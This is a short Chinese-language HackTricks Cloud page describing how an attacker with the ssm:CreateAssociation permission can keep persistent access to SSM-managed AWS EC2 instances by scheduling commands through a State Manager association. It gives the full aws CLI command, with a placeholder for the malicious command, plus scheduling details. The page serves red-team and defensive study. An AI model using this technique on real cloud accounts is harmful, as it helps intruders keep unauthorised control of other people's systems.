AWS - SSM Perssitence
Tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
SSM
更多信息请参见:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
使用 ssm:CreateAssociation for persistence
具有 ssm:CreateAssociation 权限的攻击者可以创建 State Manager Association,在由 SSM 管理的 EC2 实例上自动执行命令。这些 associations 可以配置为以固定间隔运行,使其适合用于无需交互式会话的 backdoor-like persistence。
aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name
Note
只要 EC2 实例由 Systems Manager 管理、SSM agent 正在运行,且攻击者有创建 associations 的权限,该持久化方法就能生效。它不需要交互式会话或显式的 ssm:SendCommand 权限。重要:
--schedule-expression参数(例如rate(30 minutes))必须遵守 AWS 的最小间隔 30 分钟。若要立即或一次性执行,请完全省略--schedule-expression—— association 在创建后会执行一次。
Tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
HackTricks Cloud

